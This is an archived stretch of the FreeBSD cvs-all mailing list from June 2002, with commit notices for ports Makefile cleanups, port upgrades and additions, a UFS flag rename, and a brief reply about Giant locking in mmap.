Makefile ports/net/gnosamba Makefile ports/net/gps Makefile ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/22 23:04:01 PDT Modified files: net/amcl Makefile net/angst Makefile net/cnet Makefile net/dlint Makefile net/fidelio Makefile net/forg Makefile net/fping Makefile net/gnosamba Makefile net/gps Makefile net/hagelslag Makefile net/kdetelnet Makefile net/libfreenet Makefile net/maradns Makefile net/netscript Makefile net/oproute Makefile net/py-libnet Makefile net/tn5250 Makefile Log: Replace ${PERL} with ${REINPLACE_CMD} PR: 39668 Submitted by: Oliver Braun Revision Changes Path 1.7 +3 -2 ports/net/amcl/Makefile 1.2 +3 -1 ports/net/angst/Makefile 1.20 +3 -2 ports/net/cnet/Makefile 1.12 +2 -1 ports/net/dlint/Makefile 1.10 +7 -6 ports/net/fidelio/Makefile 1.2 +2 -1 ports/net/forg/Makefile 1.14 +2 -1 ports/net/fping/Makefile 1.18 +2 -1 ports/net/gnosamba/Makefile 1.2 +2 -1 ports/net/gps/Makefile 1.3 +3 -2 ports/net/hagelslag/Makefile 1.18 +2 -1 ports/net/kdetelnet/Makefile 1.5 +2 -1 ports/net/libfreenet/Makefile 1.22 +4 -2 ports/net/maradns/Makefile 1.13 +2 -1 ports/net/netscript/Makefile 1.3 +3 -1 ports/net/oproute/Makefile 1.2 +2 -1 ports/net/py-libnet/Makefile 1.15 +2 -1 ports/net/tn5250/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 23: 8:44 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 85FB237B40F; Sat, 22 Jun 2002 23:06:22 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N66Mx52724; Sat, 22 Jun 2002 23:06:22 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206230606.g5N66Mx52724@freefall.freebsd.org> From: Ying-Chieh Liao Date: Sat, 22 Jun 2002 23:06:22 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/misc/granulate Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/22 23:06:22 PDT Modified files: misc/granulate Makefile Log: ${PERL} -> ${REINPLACE_CMD} PR: 39670 Submitted by: maintainer Revision Changes Path 1.6 +3 -2 ports/misc/granulate/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 23:11: 4 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CEDDC37B433; Sat, 22 Jun 2002 23:09:20 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N69KD53251; Sat, 22 Jun 2002 23:09:20 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206230609.g5N69KD53251@freefall.freebsd.org> From: Ying-Chieh Liao Date: Sat, 22 Jun 2002 23:09:20 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/news/nntpcache Makefile ports/news/pyne Makefile ports/news/xrn Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/22 23:09:20 PDT Modified files: news/nntpcache Makefile news/pyne Makefile news/xrn Makefile Log: Replace ${PERL} with ${REINPLACE_CMD} PR: 39675 Submitted by: Oliver Braun Revision Changes Path 1.22 +2 -1 ports/news/nntpcache/Makefile 1.2 +2 -1 ports/news/pyne/Makefile 1.4 +3 -2 ports/news/xrn/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 23:12:26 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 792C137B401; Sat, 22 Jun 2002 23:12:23 -0700 (PDT) Received: (from dillon@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N6CNa54168; Sat, 22 Jun 2002 23:12:23 -0700 (PDT) (envelope-from dillon) Message-Id: <200206230612.g5N6CNa54168@freefall.freebsd.org> From: Matt Dillon Date: Sat, 22 Jun 2002 23:12:23 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/ufs/ffs ffs_balloc.c ffs_inode.c ffs_snapshot.c src/sys/ufs/ufs ufs_extern.h ufs_lookup.c ufs_readwrite.c ufs_vnops.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dillon 2002/06/22 23:12:23 PDT Modified files: sys/ufs/ffs ffs_balloc.c ffs_inode.c ffs_snapshot.c sys/ufs/ufs ufs_extern.h ufs_lookup.c ufs_readwrite.c ufs_vnops.c Log: Rename the BALLOC flags from B_* to BA_* to avoid confusion with the struct buf B_ flags. Approved by: mckusick Revision Changes Path 1.36 +20 -20 src/sys/ufs/ffs/ffs_balloc.c 1.80 +6 -6 src/sys/ufs/ffs/ffs_inode.c 1.37 +12 -12 src/sys/ufs/ffs/ffs_snapshot.c 1.43 +4 -4 src/sys/ufs/ufs/ufs_extern.h 1.62 +2 -2 src/sys/ufs/ufs/ufs_lookup.c 1.92 +3 -3 src/sys/ufs/ufs/ufs_readwrite.c 1.197 +1 -1 src/sys/ufs/ufs/ufs_vnops.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 23:13:46 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1FB6D37B400; Sat, 22 Jun 2002 23:13:44 -0700 (PDT) Received: (from sada@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N6Dhl54451; Sat, 22 Jun 2002 23:13:43 -0700 (PDT) (envelope-from sada) Message-Id: <200206230613.g5N6Dhl54451@freefall.freebsd.org> From: SADA Kenji Date: Sat, 22 Jun 2002 23:13:40 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www Makefile ports/www/cgi-lib.pl Makefile distinfo pkg-comment pkg-descr pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sada 2002/06/22 23:13:40 PDT Modified files: www Makefile Added files: www/cgi-lib.pl Makefile distinfo pkg-comment pkg-descr pkg-plist Log: Add new port: www/cgi-lib.pl . cgi-lib.pl is a popular perl library for creating CGI. Approved by: DougB Revision Changes Path 1.511 +1 -0 ports/www/Makefile 1.1 +30 -0 ports/www/cgi-lib.pl/Makefile (new) 1.1 +1 -0 ports/www/cgi-lib.pl/distinfo (new) 1.1 +1 -0 ports/www/cgi-lib.pl/pkg-comment (new) 1.1 +18 -0 ports/www/cgi-lib.pl/pkg-descr (new) 1.1 +1 -0 ports/www/cgi-lib.pl/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 23:15: 9 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A270F37B401; Sat, 22 Jun 2002 23:15:06 -0700 (PDT) Received: (from sada@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N6F6154661; Sat, 22 Jun 2002 23:15:06 -0700 (PDT) (envelope-from sada) Message-Id: <200206230615.g5N6F6154661@freefall.freebsd.org> From: SADA Kenji Date: Sat, 22 Jun 2002 23:15:06 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sada 2002/06/22 23:15:06 PDT Modified files: . modules Log: cgi-lib.pl --> ports/www/cgi-lib.pl Revision Changes Path 1.5406 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 23:21:30 2002 Delivered-To: cvs-all@freebsd.org Received: from cs.rice.edu (cs.rice.edu [128.42.1.30]) by hub.freebsd.org (Postfix) with ESMTP id 9B5DD37B401; Sat, 22 Jun 2002 23:21:26 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by cs.rice.edu (Postfix) with ESMTP id 9AB6B4AAC2; Sun, 23 Jun 2002 01:21:25 -0500 (CDT) Received: by cs.rice.edu (Postfix, from userid 19572) id 283344AAC0; Sun, 23 Jun 2002 01:21:25 -0500 (CDT) Date: Sun, 23 Jun 2002 01:21:25 -0500 From: Alan Cox To: Alfred Perlstein Cc: Alan Cox , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/vm vm_mmap.c Message-ID: <20020623062125.GH19727@cs.rice.edu> References: <200206230148.g5N1mN795443@freefall.freebsd.org> <20020623052710.GK53232@elvis.mu.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020623052710.GK53232@elvis.mu.org> User-Agent: Mutt/1.3.28i X-Virus-Scanned: by AMaViS snapshot-20010714 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sat, Jun 22, 2002 at 10:27:10PM -0700, Alfred Perlstein wrote: > * Alan Cox [020622 18:48] wrote: > > alc 2002/06/22 18:48:23 PDT > > > > Modified files: > > sys/vm vm_mmap.c > > Log: > > o Remove the unnecessary acquisition and release of Giant around fdrop() > > in mmap(2). > > I think fdrop() may need Giant in case a race with a thread makes > it the instance of fdrop() that leads to fclose() being called which > can call down into the VFS code. > fdrop_locked(), which is called by fdrop(), acquires and releases Giant in the scenario that you describe. Alan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 23:23:26 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7905E37B401; Sat, 22 Jun 2002 23:23:23 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N6NNF56003; Sat, 22 Jun 2002 23:23:23 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206230623.g5N6NNF56003@freefall.freebsd.org> From: Ying-Chieh Liao Date: Sat, 22 Jun 2002 23:23:23 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-fm/gentoo Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/22 23:23:23 PDT Modified files: x11-fm/gentoo Makefile distinfo Log: upgrade to 0.11.27 PR: 39685 Submitted by: maintainer Revision Changes Path 1.15 +4 -4 ports/x11-fm/gentoo/Makefile 1.11 +1 -1 ports/x11-fm/gentoo/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 23:35:18 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 154B037B400; Sat, 22 Jun 2002 23:35:16 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N6ZGM57548; Sat, 22 Jun 2002 23:35:16 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206230635.g5N6ZGM57548@freefall.freebsd.org> From: Ying-Chieh Liao Date: Sat, 22 Jun 2002 23:35:15 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/py-smb Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/22 23:35:15 PDT Modified files: net/py-smb Makefile distinfo Log: upgrade to 0.4.1 Revision Changes Path 1.3 +1 -1 ports/net/py-smb/Makefile 1.3 +1 -1 ports/net/py-smb/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 23:38:34 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D913E37B400; Sat, 22 Jun 2002 23:38:30 -0700 (PDT) Received: (from will@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N6cUI58303; Sat, 22 Jun 2002 23:38:30 -0700 (PDT) (envelope-from will) Message-Id: <200206230638.g5N6cUI58303@freefall.freebsd.org> From: Will Andrews Date: Sat, 22 Jun 2002 23:38:30 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/textproc Makefile ports/textproc/p5-Lingua-Ident Makefile distinfo pkg-comment pkg-descr pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG will 2002/06/22 23:38:30 PDT Modified files: textproc Makefile Added files: textproc/p5-Lingua-Ident Makefile distinfo pkg-comment pkg-descr pkg-plist Log: Add p5-Lingua-Ident 1.4, a perl package for statistical language identification. PR: 33437 Submitted by: Seamus Venasse Revision Changes Path 1.378 +1 -0 ports/textproc/Makefile 1.1 +23 -0 ports/textproc/p5-Lingua-Ident/Makefile (new) 1.1 +1 -0 ports/textproc/p5-Lingua-Ident/distinfo (new) 1.1 +1 -0 ports/textproc/p5-Lingua-Ident/pkg-comment (new) 1.1 +9 -0 ports/textproc/p5-Lingua-Ident/pkg-descr (new) 1.1 +6 -0 ports/textproc/p5-Lingua-Ident/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 23:39: 2 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4165E37B40C; Sat, 22 Jun 2002 23:38:48 -0700 (PDT) Received: (from will@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N6cmV58379; Sat, 22 Jun 2002 23:38:48 -0700 (PDT) (envelope-from will) Message-Id: <200206230638.g5N6cmV58379@freefall.freebsd.org> From: Will Andrews Date: Sat, 22 Jun 2002 23:38:48 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG will 2002/06/22 23:38:48 PDT Modified files: . modules Log: p5-Lingua-Ident --> ports/textproc/p5-Lingua-Ident Revision Changes Path 1.5407 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message